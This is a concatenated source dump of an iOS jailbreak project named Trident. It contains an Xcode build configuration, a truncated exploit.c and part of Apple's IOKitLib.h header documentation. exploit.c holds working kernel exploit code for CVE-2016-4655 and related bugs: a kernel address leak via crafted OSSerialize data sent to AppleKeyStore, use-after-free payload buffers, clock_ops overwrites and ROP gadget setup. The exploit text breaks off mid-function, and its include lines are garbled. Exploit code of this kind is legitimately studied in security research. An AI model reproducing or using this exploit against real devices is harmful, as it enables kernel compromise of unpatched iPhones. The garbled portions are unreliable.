YES; 236 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 237 | CLANG_CXX_LIBRARY = "libc++"; 238 | CLANG_ENABLE_MODULES = YES; 239 | CLANG_ENABLE_OBJC_ARC = YES; 240 | CLANG_WARN_BOOL_CONVERSION = YES; 241 | CLANG_WARN_CONSTANT_CONVERSION = YES; 242 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 243 | CLANG_WARN_EMPTY_BODY = YES; 244 | CLANG_WARN_ENUM_CONVERSION = YES; 245 | CLANG_WARN_INFINITE_RECURSION = YES; 246 | CLANG_WARN_INT_CONVERSION = YES; 247 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 248 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 249 | CLANG_WARN_UNREACHABLE_CODE = YES; 250 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 251 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 252 | COPY_PHASE_STRIP = NO; 253 | DEBUG_INFORMATION_FORMAT = dwarf; 254 | ENABLE_STRICT_OBJC_MSGSEND = YES; 255 | ENABLE_TESTABILITY = YES; 256 | GCC_C_LANGUAGE_STANDARD = gnu99; 257 | GCC_DYNAMIC_NO_PIC = NO; 258 | GCC_NO_COMMON_BLOCKS = YES; 259 | GCC_OPTIMIZATION_LEVEL = 0; 260 | GCC_PREPROCESSOR_DEFINITIONS = ( 261 | "DEBUG=1", 262 | "$(inherited)", 263 | ); 264 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 265 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 266 | GCC_WARN_UNDECLARED_SELECTOR = YES; 267 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 268 | GCC_WARN_UNUSED_FUNCTION = YES; 269 | GCC_WARN_UNUSED_VARIABLE = YES; 270 | IPHONEOS_DEPLOYMENT_TARGET = 9.3; 271 | MTL_ENABLE_DEBUG_INFO = YES; 272 | ONLY_ACTIVE_ARCH = YES; 273 | SDKROOT = iphoneos; 274 | TARGETED_DEVICE_FAMILY = "1,2"; 275 | }; 276 | name = Debug; 277 | }; 278 | 43CDFA591DCFA16600046EB0 /* Release */ = { 279 | isa = XCBuildConfiguration; 280 | buildSettings = { 281 | ALWAYS_SEARCH_USER_PATHS = NO; 282 | CLANG_ANALYZER_NONNULL = YES; 283 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 284 | CLANG_CXX_LIBRARY = "libc++"; 285 | CLANG_ENABLE_MODULES = YES; 286 | CLANG_ENABLE_OBJC_ARC = YES; 287 | CLANG_WARN_BOOL_CONVERSION = YES; 288 | CLANG_WARN_CONSTANT_CONVERSION = YES; 289 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 290 | CLANG_WARN_EMPTY_BODY = YES; 291 | CLANG_WARN_ENUM_CONVERSION = YES; 292 | CLANG_WARN_INFINITE_RECURSION = YES; 293 | CLANG_WARN_INT_CONVERSION = YES; 294 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 295 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 296 | CLANG_WARN_UNREACHABLE_CODE = YES; 297 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 298 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 299 | COPY_PHASE_STRIP = NO; 300 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 301 | ENABLE_NS_ASSERTIONS = NO; 302 | ENABLE_STRICT_OBJC_MSGSEND = YES; 303 | GCC_C_LANGUAGE_STANDARD = gnu99; 304 | GCC_NO_COMMON_BLOCKS = YES; 305 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 306 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 307 | GCC_WARN_UNDECLARED_SELECTOR = YES; 308 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 309 | GCC_WARN_UNUSED_FUNCTION = YES; 310 | GCC_WARN_UNUSED_VARIABLE = YES; 311 | IPHONEOS_DEPLOYMENT_TARGET = 9.3; 312 | MTL_ENABLE_DEBUG_INFO = NO; 313 | SDKROOT = iphoneos; 314 | TARGETED_DEVICE_FAMILY = "1,2"; 315 | VALIDATE_PRODUCT = YES; 316 | }; 317 | name = Release; 318 | }; 319 | 43CDFA5B1DCFA16600046EB0 /* Debug */ = { 320 | isa = XCBuildConfiguration; 321 | buildSettings = { 322 | ALWAYS_SEARCH_USER_PATHS = YES; 323 | ARCHS = "$(ARCHS_STANDARD_32_BIT)"; 324 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 325 | DEVELOPMENT_TEAM = 4P3PNUDM94; 326 | INFOPLIST_FILE = Trident/Info.plist; 327 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 328 | OTHER_CFLAGS = "-fno-stack-protector"; 329 | PRODUCT_BUNDLE_IDENTIFIER = "com.Benjamin-Randazzo.Trident"; 330 | PRODUCT_NAME = "$(TARGET_NAME)"; 331 | USER_HEADER_SEARCH_PATHS = "$(PROJECT_DIR)/Headers"; 332 | VALID_ARCHS = "armv7 armv7s"; 333 | }; 334 | name = Debug; 335 | }; 336 | 43CDFA5C1DCFA16600046EB0 /* Release */ = { 337 | isa = XCBuildConfiguration; 338 | buildSettings = { 339 | ALWAYS_SEARCH_USER_PATHS = YES; 340 | ARCHS = "$(ARCHS_STANDARD_32_BIT)"; 341 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 342 | DEVELOPMENT_TEAM = 4P3PNUDM94; 343 | INFOPLIST_FILE = Trident/Info.plist; 344 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 345 | OTHER_CFLAGS = "-fno-stack-protector"; 346 | PRODUCT_BUNDLE_IDENTIFIER = "com.Benjamin-Randazzo.Trident"; 347 | PRODUCT_NAME = "$(TARGET_NAME)"; 348 | USER_HEADER_SEARCH_PATHS = "$(PROJECT_DIR)/Headers"; 349 | VALID_ARCHS = "armv7 armv7s"; 350 | }; 351 | name = Release; 352 | }; 353 | /* End XCBuildConfiguration section */ 354 | 355 | /* Begin XCConfigurationList section */ 356 | 43CDFA3E1DCFA16600046EB0 /* Build configuration list for PBXProject "Trident" */ = { 357 | isa = XCConfigurationList; 358 | buildConfigurations = ( 359 | 43CDFA581DCFA16600046EB0 /* Debug */, 360 | 43CDFA591DCFA16600046EB0 /* Release */, 361 | ); 362 | defaultConfigurationIsVisible = 0; 363 | defaultConfigurationName = Release; 364 | }; 365 | 43CDFA5A1DCFA16600046EB0 /* Build configuration list for PBXNativeTarget "Trident" */ = { 366 | isa = XCConfigurationList; 367 | buildConfigurations = ( 368 | 43CDFA5B1DCFA16600046EB0 /* Debug */, 369 | 43CDFA5C1DCFA16600046EB0 /* Release */, 370 | ); 371 | defaultConfigurationIsVisible = 0; 372 | defaultConfigurationName = Release; 373 | }; 374 | /* End XCConfigurationList section */ 375 | }; 376 | rootObject = 43CDFA3B1DCFA16600046EB0 /* Project object */; 377 | } 378 | -------------------------------------------------------------------------------- /Trident/exploit.c: -------------------------------------------------------------------------------- 1 | // 2 | // exploit.c 3 | // Trident 4 | // 5 | // Created by Benjamin Randazzo on 06/11/2016. 6 | // Copyright © 2016 Benjamin Randazzo. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #include 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | #include 22 | 23 | #include 24 | 25 | #include "offsetfinder.h" 26 | 27 | enum 28 | { 29 | kOSSerializeDictionary = 0x01000000U, 30 | kOSSerializeArray = 0x02000000U, 31 | kOSSerializeSet = 0x03000000U, 32 | kOSSerializeNumber = 0x04000000U, 33 | kOSSerializeSymbol = 0x08000000U, 34 | kOSSerializeString = 0x09000000U, 35 | kOSSerializeData = 0x0a000000U, 36 | kOSSerializeBoolean = 0x0b000000U, 37 | kOSSerializeObject = 0x0c000000U, 38 | kOSSerializeTypeMask = 0x7F000000U, 39 | kOSSerializeDataMask = 0x00FFFFFFU, 40 | kOSSerializeEndCollecton = 0x80000000U, 41 | }; 42 | 43 | #define kOSSerializeBinarySignature "\323\0\0" 44 | 45 | kern_return_t io_service_open_extended(mach_port_t service, task_t owningTask, uint32_t connect_type, NDR_record_t ndr, io_buf_ptr_t properties, mach_msg_type_number_t propertiesCnt, kern_return_t *result, mach_port_t *connection); 46 | 47 | kern_return_t io_registry_entry_get_properties(mach_port_t registry_entry, io_buf_ptr_t *properties, mach_msg_type_number_t *propertiesCnt); 48 | 49 | kern_return_t io_service_get_matching_services_bin(mach_port_t master_port, io_struct_inband_t matching, mach_msg_type_number_t matchingCnt, mach_port_t *existing); 50 | 51 | #define WRITE_IN(buf, data) do { *(uint32_t *)(buf+bufpos) = (data); bufpos+=4; } while(0) 52 | 53 | #define TTB_SIZE 4096 54 | 55 | #define L1_SECT_S_BIT (1 << 16) 56 | #define L1_SECT_PROTO (1 << 1) /* 0b10 */ 57 | #define L1_SECT_AP_URW (1 << 10) | (1 << 11) 58 | #define L1_SECT_APX (1 << 15) 59 | #define L1_SECT_DEFPROT (L1_SECT_AP_URW | L1_SECT_APX) 60 | #define L1_SECT_SORDER (0) /* 0b00, not cacheable, strongly ordered. */ 61 | #define L1_SECT_DEFCACHE (L1_SECT_SORDER) 62 | #define L1_PROTO_TTE(entry) (entry | L1_SECT_S_BIT | L1_SECT_DEFPROT | L1_SECT_DEFCACHE) 63 | 64 | #define L1_PAGE_PROTO (1 << 0) 65 | #define L1_COARSE_PT (0xFFFFFC00) 66 | 67 | #define PT_SIZE 256 68 | 69 | #define L2_PAGE_APX (1 << 9) 70 | 71 | const char *lock_last_path_component = "/tmp/lock"; 72 | char *lockfile; 73 | int fd; 74 | 75 | int fildes[2]; 76 | uint32_t cpipe; 77 | uint32_t pipebuf; 78 | 79 | clock_serv_t clk_battery; 80 | clock_serv_t clk_realtime; 81 | 82 | unsigned char clock_ops_overwrite[] = { 83 | 0x00, 0x00, 0x00, 0x00, // [00] (rtclock.getattr): address of OSSerializer::serialize (+1) 84 | 0x00, 0x00, 0x00, 0x00, // [04] (calend_config): NULL 85 | 0x00, 0x00, 0x00, 0x00, // [08] (calend_init): NULL 86 | 0x00, 0x00, 0x00, 0x00, // [0C] (calend_gettime): address of calend_gettime (+1) 87 | 0x00, 0x00, 0x00, 0x00, // [10] (calend_getattr): address of _bufattr_cpx (+1) 88 | }; 89 | 90 | unsigned char uaf_payload_buffer[] = { 91 | 0x00, 0x00, 0x00, 0x00, // [00] ptr to clock_ops_overwrite buffer 92 | 0x00, 0x00, 0x00, 0x00, // [04] address of clock_ops array in kern memory 93 | 0x00, 0x00, 0x00, 0x00, // [08] address of _copyin 94 | 0x00, 0x00, 0x00, 0x00, // [0C] NULL 95 | 0x00, 0x00, 0x00, 0x00, // [10] address of OSSerializer::serialize (+1) 96 | 0x00, 0x00, 0x00, 0x00, // [14] address of "BX LR" code fragment 97 | 0x00, 0x00, 0x00, 0x00, // [18] NULL 98 | 0x00, 0x00, 0x00, 0x00, // [1C] address of OSSymbol::getMetaClass (+1) 99 | 0x00, 0x00, 0x00, 0x00, // [20] address of "BX LR" code fragment 100 | 0x00, 0x00, 0x00, 0x00, // [24] address of "BX LR" code fragment 101 | }; 102 | 103 | unsigned char pExploit[128]; 104 | 105 | #define PAYLOAD_TO_PEXPLOIT (-76) 106 | #define PEXPLOIT_TO_UAF_PAYLOAD 8 107 | 108 | vm_offset_t vm_kernel_addrperm; 109 | 110 | uint32_t write_gadget; // address of "str r1, [r0, #0xc] ; bx lr" 111 | 112 | void initialize(void) { 113 | kern_return_t kr; 114 | char *home = getenv("HOME"); 115 | 116 | lockfile = malloc(strlen(home) + strlen(lock_last_path_component) + 1); 117 | assert(lockfile); 118 | 119 | strcpy(lockfile, home); 120 | strcat(lockfile, lock_last_path_component); 121 | 122 | fd = open(lockfile, O_CREAT | O_WRONLY, 0644); 123 | assert(fd != -1); 124 | 125 | flock(fd, LOCK_EX); 126 | 127 | assert(pipe(fildes) != -1); 128 | 129 | kr = host_get_clock_service(mach_host_self(), CALENDAR_CLOCK, &clk_battery); 130 | if (kr != KERN_SUCCESS) { 131 | printf("err: %d\n", err_get_code(kr)); 132 | } 133 | 134 | kr = host_get_clock_service(mach_host_self(), REALTIME_CLOCK, &clk_realtime); 135 | if (kr != KERN_SUCCESS) { 136 | printf("err: %d\n", err_get_code(kr)); 137 | } 138 | } 139 | 140 | // CVE-2016-4655 141 | uint32_t leak_kernel_base(void) { 142 | char data[4096]; 143 | uint32_t bufpos = 0; 144 | 145 | memcpy(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature)); 146 | bufpos += sizeof(kOSSerializeBinarySignature); 147 | 148 | WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 2); 149 | 150 | WRITE_IN(data, kOSSerializeSymbol | 30); 151 | WRITE_IN(data, 0x4b444948); // "HIDKeyboardModifierMappingSrc" 152 | WRITE_IN(data, 0x6f627965); 153 | WRITE_IN(data, 0x4d647261); 154 | WRITE_IN(data, 0x6669646f); 155 | WRITE_IN(data, 0x4d726569); 156 | WRITE_IN(data, 0x69707061); 157 | WRITE_IN(data, 0x7253676e); 158 | WRITE_IN(data, 0x00000063); 159 | WRITE_IN(data, kOSSerializeNumber | 2048); 160 | WRITE_IN(data, 0x00000004); 161 | WRITE_IN(data, 0x00000000); 162 | 163 | WRITE_IN(data, kOSSerializeSymbol | 30); 164 | WRITE_IN(data, 0x4b444948); // "HIDKeyboardModifierMappingDst" 165 | WRITE_IN(data, 0x6f627965); 166 | WRITE_IN(data, 0x4d647261); 167 | WRITE_IN(data, 0x6669646f); 168 | WRITE_IN(data, 0x4d726569); 169 | WRITE_IN(data, 0x69707061); 170 | WRITE_IN(data, 0x7344676e); 171 | WRITE_IN(data, 0x00000074); 172 | WRITE_IN(data, kOSSerializeNumber | kOSSerializeEndCollecton | 32); 173 | WRITE_IN(data, 0x00000193); 174 | WRITE_IN(data, 0X00000000); 175 | 176 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleKeyStore")); 177 | io_connect_t connection; 178 | kern_return_t result; 179 | 180 | io_service_open_extended(service, mach_task_self(), 0, NDR_record, data, bufpos, &result, &connection); 181 | if (result != KERN_SUCCESS) { 182 | printf("err: %d\n", err_get_code(result)); 183 | } 184 | 185 | io_object_t object = 0; 186 | uint32_t size = sizeof(data); 187 | io_iterator_t iterator; 188 | IORegistryEntryGetChildIterator(service, "IOService", &iterator); 189 | 190 | do { 191 | if (object) { 192 | IOObjectRelease(object); 193 | } 194 | object = IOIteratorNext(iterator); 195 | } while (IORegistryEntryGetProperty(object, "HIDKeyboardModifierMappingSrc", data, &size)); 196 | 197 | if (size > 8) { 198 | int i; 199 | for (i=0; i 8) { 282 | int i; 283 | for (i=0; i 40 | #include 41 | 42 | #include 43 | #include 44 | 45 | #include 46 | #include 47 | #include 48 | 49 | #include 50 | #include 51 | 52 | #include 53 | 54 | #include 55 | 56 | #include 57 | 58 | __BEGIN_DECLS 59 | 60 | /*! @header IOKitLib 61 | IOKitLib implements non-kernel task access to common IOKit object types - IORegistryEntry, IOService, IOIterator etc. These functions are generic - families may provide API that is more specific.
62 | IOKitLib represents IOKit objects outside the kernel with the types io_object_t, io_registry_entry_t, io_service_t, & io_connect_t. Function names usually begin with the type of object they are compatible with - eg. IOObjectRelease can be used with any io_object_t. Inside the kernel, the c++ class hierarchy allows the subclasses of each object type to receive the same requests from user level clients, for example in the kernel, IOService is a subclass of IORegistryEntry, which means any of the IORegistryEntryXXX functions in IOKitLib may be used with io_service_t's as well as io_registry_t's. There are functions available to introspect the class of the kernel object which any io_object_t et al. represents. 63 | IOKit objects returned by all functions should be released with IOObjectRelease. 64 | */ 65 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 66 | 67 | typedef struct IONotificationPort * IONotificationPortRef; 68 | 69 | 70 | /*! @typedef IOServiceMatchingCallback 71 | @abstract Callback function to be notified of IOService publication. 72 | @param refcon The refcon passed when the notification was installed. 73 | @param iterator The notification iterator which now has new objects. 74 | */ 75 | typedef void 76 | (*IOServiceMatchingCallback)( 77 | void * refcon, 78 | io_iterator_t iterator ); 79 | 80 | /*! @typedef IOServiceInterestCallback 81 | @abstract Callback function to be notified of changes in state of an IOService. 82 | @param refcon The refcon passed when the notification was installed. 83 | @param service The IOService whose state has changed. 84 | @param messageType A messageType enum, defined by IOKit/IOMessage.h or by the IOService's family. 85 | @param messageArgument An argument for the message, dependent on the messageType. If the message data is larger than sizeof(void*), then messageArgument contains a pointer to the message data; otherwise, messageArgument contains the message data. 86 | */ 87 | 88 | typedef void 89 | (*IOServiceInterestCallback)( 90 | void * refcon, 91 | io_service_t service, 92 | uint32_t messageType, 93 | void * messageArgument ); 94 | 95 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 96 | 97 | /*! @const kIOMasterPortDefault 98 | @abstract The default mach port used to initiate communication with IOKit. 99 | @discussion When specifying a master port to IOKit functions, the NULL argument indicates "use the default". This is a synonym for NULL, if you'd rather use a named constant. 100 | */ 101 | 102 | extern 103 | const mach_port_t kIOMasterPortDefault; 104 | 105 | /*! @function IOMasterPort 106 | @abstract Returns the mach port used to initiate communication with IOKit. 107 | @discussion Functions that don't specify an existing object require the IOKit master port to be passed. This function obtains that port. 108 | @param bootstrapPort Pass MACH_PORT_NULL for the default. 109 | @param masterPort The master port is returned. 110 | @result A kern_return_t error code. */ 111 | 112 | kern_return_t 113 | IOMasterPort( mach_port_t bootstrapPort, 114 | mach_port_t * masterPort ); 115 | 116 | 117 | /*! @function IONotificationPortCreate 118 | @abstract Creates and returns a notification object for receiving IOKit notifications of new devices or state changes. 119 | @discussion Creates the notification object to receive notifications from IOKit of new device arrivals or state changes. The notification object can be supply a CFRunLoopSource, or mach_port_t to be used to listen for events. 120 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 121 | @result A reference to the notification object. */ 122 | 123 | IONotificationPortRef 124 | IONotificationPortCreate( 125 | mach_port_t masterPort ); 126 | 127 | /*! @function IONotificationPortDestroy 128 | @abstract Destroys a notification object created with IONotificationPortCreate. 129 | Also destroys any mach_port's or CFRunLoopSources obatined from 130 | @link IONotificationPortGetRunLoopSource @/link 131 | or @link IONotificationPortGetMachPort @/link 132 | @param notify A reference to the notification object. */ 133 | 134 | void 135 | IONotificationPortDestroy( 136 | IONotificationPortRef notify ); 137 | 138 | /*! @function IONotificationPortGetRunLoopSource 139 | @abstract Returns a CFRunLoopSource to be used to listen for notifications. 140 | @discussion A notification object may deliver notifications to a CFRunLoop 141 | by adding the run loop source returned by this function to the run loop. 142 | 143 | The caller should not release this CFRunLoopSource. Just call 144 | @link IONotificationPortDestroy @/link to dispose of the 145 | IONotificationPortRef and the CFRunLoopSource when done. 146 | @param notify The notification object. 147 | @result A CFRunLoopSourceRef for the notification object. */ 148 | 149 | CFRunLoopSourceRef 150 | IONotificationPortGetRunLoopSource( 151 | IONotificationPortRef notify ); 152 | 153 | /*! @function IONotificationPortGetMachPort 154 | @abstract Returns a mach_port to be used to listen for notifications. 155 | @discussion A notification object may deliver notifications to a mach messaging client 156 | if they listen for messages on the port obtained from this function. 157 | Callbacks associated with the notifications may be delivered by calling 158 | IODispatchCalloutFromMessage with messages received. 159 | 160 | The caller should not release this mach_port_t. Just call 161 | @link IONotificationPortDestroy @/link to dispose of the 162 | mach_port_t and IONotificationPortRef when done. 163 | @param notify The notification object. 164 | @result A mach_port for the notification object. */ 165 | 166 | mach_port_t 167 | IONotificationPortGetMachPort( 168 | IONotificationPortRef notify ); 169 | 170 | /*! @function IONotificationPortSetDispatchQueue 171 | @abstract Sets a dispatch queue to be used to listen for notifications. 172 | @discussion A notification object may deliver notifications to a dispatch client. 173 | @param notify The notification object. 174 | @param queue A dispatch queue. */ 175 | 176 | void 177 | IONotificationPortSetDispatchQueue( 178 | IONotificationPortRef notify, dispatch_queue_t queue ) 179 | __OSX_AVAILABLE_STARTING(__MAC_10_6, __IPHONE_4_3); 180 | 181 | /*! @function IODispatchCalloutFromMessage 182 | @abstract Dispatches callback notifications from a mach message. 183 | @discussion A notification object may deliver notifications to a mach messaging client, 184 | which should call this function to generate the callbacks associated with the notifications arriving on the port. 185 | @param unused Not used, set to zero. 186 | @param msg A pointer to the message received. 187 | @param reference Pass the IONotificationPortRef for the object. */ 188 | 189 | void 190 | IODispatchCalloutFromMessage( 191 | void *unused, 192 | mach_msg_header_t *msg, 193 | void *reference ); 194 | 195 | /*! @function IOCreateReceivePort 196 | @abstract Creates and returns a mach port suitable for receiving IOKit messages of the specified type. 197 | @discussion In the future IOKit may use specialized messages and ports 198 | instead of the standard ports created by mach_port_allocate(). Use this 199 | function instead of mach_port_allocate() to ensure compatibility with future 200 | revisions of IOKit. 201 | @param msgType Type of message to be sent to this port 202 | (kOSNotificationMessageID or kOSAsyncCompleteMessageID) 203 | @param recvPort The created port is returned. 204 | @result A kern_return_t error code. */ 205 | 206 | kern_return_t 207 | IOCreateReceivePort( uint32_t msgType, mach_port_t * recvPort ); 208 | 209 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 210 | 211 | /* 212 | * IOObject 213 | */ 214 | 215 | /*! @function IOObjectRelease 216 | @abstract Releases an object handle previously returned by IOKitLib. 217 | @discussion All objects returned by IOKitLib should be released with this function when access to them is no longer needed. Using the object after it has been released may or may not return an error, depending on how many references the task has to the same object in the kernel. 218 | @param object The IOKit object to release. 219 | @result A kern_return_t error code. */ 220 | 221 | kern_return_t 222 | IOObjectRelease( 223 | io_object_t object ); 224 | 225 | /*! @function IOObjectRetain 226 | @abstract Retains an object handle previously returned by IOKitLib. 227 | @discussion Gives the caller an additional reference to an existing object handle previously returned by IOKitLib. 228 | @param object The IOKit object to retain. 229 | @result A kern_return_t error code. */ 230 | 231 | kern_return_t 232 | IOObjectRetain( 233 | io_object_t object ); 234 | 235 | /*! @function IOObjectGetClass 236 | @abstract Return the class name of an IOKit object. 237 | @discussion This function uses the OSMetaClass system in the kernel to derive the name of the class the object is an instance of. 238 | @param object The IOKit object. 239 | @param className Caller allocated buffer to receive the name string. 240 | @result A kern_return_t error code. */ 241 | 242 | kern_return_t 243 | IOObjectGetClass( 244 | io_object_t object, 245 | io_name_t className ); 246 | 247 | /*! @function IOObjectCopyClass 248 | @abstract Return the class name of an IOKit object. 249 | @discussion This function does the same thing as IOObjectGetClass, but returns the result as a CFStringRef. 250 | @param object The IOKit object. 251 | @result The resulting CFStringRef. This should be released by the caller. If a valid object is not passed in, then NULL is returned.*/ 252 | 253 | CFStringRef 254 | IOObjectCopyClass(io_object_t object) 255 | AVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER; 256 | 257 | /*! @function IOObjectCopySuperclassForClass 258 | @abstract Return the superclass name of the given class. 259 | @discussion This function uses the OSMetaClass system in the kernel to derive the name of the superclass of the class. 260 | @param classname The name of the class as a CFString. 261 | @result The resulting CFStringRef. This should be released by the caller. If there is no superclass, or a valid class name is not passed in, then NULL is returned.*/ 262 | 263 | CFStringRef 264 | IOObjectCopySuperclassForClass(CFStringRef classname) 265 | AVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER; 266 | 267 | /*! @function IOObjectCopyBundleIdentifierForClass 268 | @abstract Return the bundle identifier of the given class. 269 | @discussion This function uses the OSMetaClass system in the kernel to derive the name of the kmod, which is the same as the bundle identifier. 270 | @param classname The name of the class as a CFString. 271 | @result The resulting CFStringRef. This should be released by the caller. If a valid class name is not passed in, then NULL is returned.*/ 272 | 273 | CFStringRef 274 | IOObjectCopyBundleIdentifierForClass(CFStringRef classname) 275 | AVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER; 276 | 277 | /*! @function IOObjectConformsTo 278 | @abstract Performs an OSDynamicCast operation on an IOKit object. 279 | @discussion This function uses the OSMetaClass system in the kernel to determine if the object will dynamic cast to a class, specified as a C-string. In other words, if the object is of that class or a subclass. 280 | @param object An IOKit object. 281 | @param className The name of the class, as a C-string. 282 | @result If the object handle is valid, and represents an object in the kernel that dynamic casts to the class true is returned, otherwise false. */ 283 | 284 | boolean_t 285 | IOObjectConformsTo( 286 | io_object_t object, 287 | const io_name_t className ); 288 | 289 | /*! @function IOObjectIsEqualTo 290 | @abstract Checks two object handles to see if they represent the same kernel object. 291 | @discussion If two object handles are returned by IOKitLib functions, this function will compare them to see if they represent the same kernel object. 292 | @param object An IOKit object. 293 | @param anObject Another IOKit object. 294 | @result If both object handles are valid, and represent the same object in the kernel true is returned, otherwise false. */ 295 | 296 | boolean_t 297 | IOObjectIsEqualTo( 298 | io_object_t object, 299 | io_object_t anObject ); 300 | 301 | /*! @function IOObjectGetKernelRetainCount 302 | @abstract Returns kernel retain count of an IOKit object. 303 | @discussion This function may be used in diagnostics to determine the current retain count of the kernel object at the kernel level. 304 | @param object An IOKit object. 305 | @result If the object handle is valid, the kernel objects retain count is returned, otherwise zero is returned. */ 306 | 307 | uint32_t 308 | IOObjectGetKernelRetainCount( 309 | io_object_t object ) 310 | AVAILABLE_MAC_OS_X_VERSION_10_6_AND_LATER; 311 | 312 | /*! @function IOObjectGetUserRetainCount 313 | @abstract Returns the retain count for the current process of an IOKit object. 314 | @discussion This function may be used in diagnostics to determine the current retain count for the calling process of the kernel object. 315 | @param object An IOKit object. 316 | @result If the object handle is valid, the objects user retain count is returned, otherwise zero is returned. */ 317 | 318 | uint32_t 319 | IOObjectGetUserRetainCount( 320 | io_object_t object ) 321 | AVAILABLE_MAC_OS_X_VERSION_10_6_AND_LATER; 322 | 323 | /*! @function IOObjectGetRetainCount 324 | @abstract Returns kernel retain count of an IOKit object. Identical to IOObjectGetKernelRetainCount() but available prior to Mac OS 10.6. 325 | @discussion This function may be used in diagnostics to determine the current retain count of the kernel object at the kernel level. 326 | @param object An IOKit object. 327 | @result If the object handle is valid, the kernel objects retain count is returned, otherwise zero is returned. */ 328 | 329 | uint32_t 330 | IOObjectGetRetainCount( 331 | io_object_t object ); 332 | 333 | 334 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 335 | 336 | /* 337 | * IOIterator, subclass of IOObject 338 | */ 339 | 340 | /*! @function IOIteratorNext 341 | @abstract Returns the next object in an iteration. 342 | @discussion This function returns the next object in an iteration, or zero if no more remain or the iterator is invalid. 343 | @param iterator An IOKit iterator handle. 344 | @result If the iterator handle is valid, the next element in the iteration is returned, otherwise zero is returned. The element should be released by the caller when it is finished. */ 345 | 346 | io_object_t 347 | IOIteratorNext( 348 | io_iterator_t iterator ); 349 | 350 | /*! @function IOIteratorReset 351 | @abstract Resets an iteration back to the beginning. 352 | @discussion If an iterator is invalid, or if the caller wants to start over, IOIteratorReset will set the iteration back to the beginning. 353 | @param iterator An IOKit iterator handle. */ 354 | 355 | void 356 | IOIteratorReset( 357 | io_iterator_t iterator ); 358 | 359 | /*! @function IOIteratorIsValid 360 | @abstract Checks an iterator is still valid. 361 | @discussion Some iterators will be made invalid if changes are made to the structure they are iterating over. This function checks the iterator is still valid and should be called when IOIteratorNext returns zero. An invalid iterator can be reset and the iteration restarted. 362 | @param iterator An IOKit iterator handle. 363 | @result True if the iterator handle is valid, otherwise false is returned. */ 364 | 365 | boolean_t 366 | IOIteratorIsValid( 367 | io_iterator_t iterator ); 368 | 369 | /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 370 | 371 | /* 372 | * IOService, subclass of IORegistryEntry 373 | */ 374 | 375 | /*! 376 | @function IOServiceGetMatchingService 377 | @abstract Look up a registered IOService object that matches a matching dictionary. 378 | @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up. 379 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 380 | @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching. 381 | @result The first service matched is returned on success. The service must be released by the caller. 382 | */ 383 | 384 | io_service_t 385 | IOServiceGetMatchingService( 386 | mach_port_t masterPort, 387 | CFDictionaryRef matching CF_RELEASES_ARGUMENT); 388 | 389 | /*! @function IOServiceGetMatchingServices 390 | @abstract Look up registered IOService objects that match a matching dictionary. 391 | @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up. 392 | @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port. 393 | @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching. 394 | @param existing An iterator handle is returned on success, and should be released by the caller when the iteration is finished. 395 | @result A kern_return_t error code. */ 396 | 397 | kern_return_t 398 | IOServiceGetMatchingServices( 399 | mach_port_t 